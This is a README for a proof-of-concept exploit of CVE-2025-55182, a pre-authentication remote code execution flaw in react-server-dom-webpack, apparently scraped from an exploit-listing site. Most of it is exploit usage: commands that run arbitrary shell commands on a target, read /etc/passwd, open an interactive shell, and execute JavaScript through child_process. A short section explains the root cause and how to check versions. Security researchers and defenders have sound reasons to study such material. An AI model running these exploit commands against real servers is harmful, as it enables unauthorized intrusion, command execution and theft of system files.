Share
## https://sploitus.com/exploit?id=54938ADA-8017-50FD-9208-2D801017EBD4
# CVE-2025-55182 Proof of Concept

> **Critical Pre-Authentication Remote Code Execution in React Server Components**

A complete proof-of-concept demonstrating CVE-2025-55182, a critical vulnerability in `react-server-dom-webpack@19.0.0` that allows unauthenticated attackers to execute arbitrary code via prototype chain pollution.

[![Security Research](https://img.shields.io/badge/Security-Research-red.svg)](https://vulners.com/cve/CVE-2025-55182)
[![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue.svg)](https://www.python.org/)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE)

## ๐ŸŽฏ Quick Start

```bash
# Clone the repository
git clone https://github.com/whiteov3rflow/CVE-2025-55182-poc
cd CVE-2025-55182-poc

# Exploit the server
python3 exploit.py --url http://localhost:3002 --cmd "whoami"
```

## ๐Ÿ”ฅ Vulnerability Details

**CVE ID**: CVE-2025-55182  
**Affected Package**: `react-server-dom-webpack@19.0.0`  
**Severity**: Critical (Pre-auth RCE)  
**CVSS**: 10.0

### Root Cause

The `requireModule` function uses bracket notation (`moduleExports[metadata[2]]`) without checking `hasOwnProperty`, allowing prototype chain traversal to access dangerous Node.js built-in modules like `vm`, `child_process`, and `fs`.

```javascript
// Vulnerable code in react-server-dom-webpack
function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  return moduleExports[metadata[2]];  // โŒ No hasOwnProperty check!
}
```

### Usage

**Execute commands:**
```bash
python3 exploit.py --url http://localhost:3002 --cmd "whoami"
python3 exploit.py --url http://localhost:3002 --cmd "cat /etc/passwd"
```

**Read files:**
```bash
python3 exploit.py --url http://localhost:3002 --read /etc/hostname
```

**Execute JavaScript:**
```bash
python3 exploit.py --url http://localhost:3002 --js "Math.sqrt(144)"
```

**Interactive shell:**
```bash
python3 exploit.py --url http://localhost:3002 --shell
```

**Run vulnerability test:**
```bash
python3 exploit.py --url http://localhost:3002 --test
```

**Quiet mode (for scripting):**
```bash
python3 exploit.py --url http://localhost:3002 --cmd "id" --quiet
```

## ๐ŸŽญ Exploitation Methods

### Method 1: vm.runInThisContext (Most Powerful)
```bash
python3 exploit.py --url http://target:3000 --js "process.mainModule.require('child_process').execSync('whoami').toString()"
```

### Method 2: child_process.execSync (Direct)
```bash
python3 exploit.py --url http://target:3000 --cmd "whoami" --method child_process
```

### Method 3: fs.readFileSync (File Access)
```bash
python3 exploit.py --url http://target:3000 --read /etc/passwd --method fs
```

## ๐Ÿ” Testing Your Application

Check if your app is vulnerable:

```bash
./check-vulnerability.sh
```

Or manually:
```bash
grep "react-server-dom-webpack" package.json
npm list react-server-dom-webpack
```

**Vulnerable versions:**
- `react-server-dom-webpack@19.0.0`
- `react-server-dom-webpack@19.0.0-rc-*`

**Fixed versions:**
- `react-server-dom-webpack@19.1.0+`



## ๐Ÿงช Example Output



## โš ๏ธ Disclaimer

This POC is provided for educational and security research purposes only. Only test against systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## ๐Ÿ“š References

- [CVE-2025-55182](https://vulners.com/cve/CVE-2025-55182)
- [React Security Advisory](https://github.com/facebook/react/security/advisories)
- [Technical Analysis](./TECHNICAL-ANALYSIS.md)

---

**Made with ๐Ÿ’€ for security research**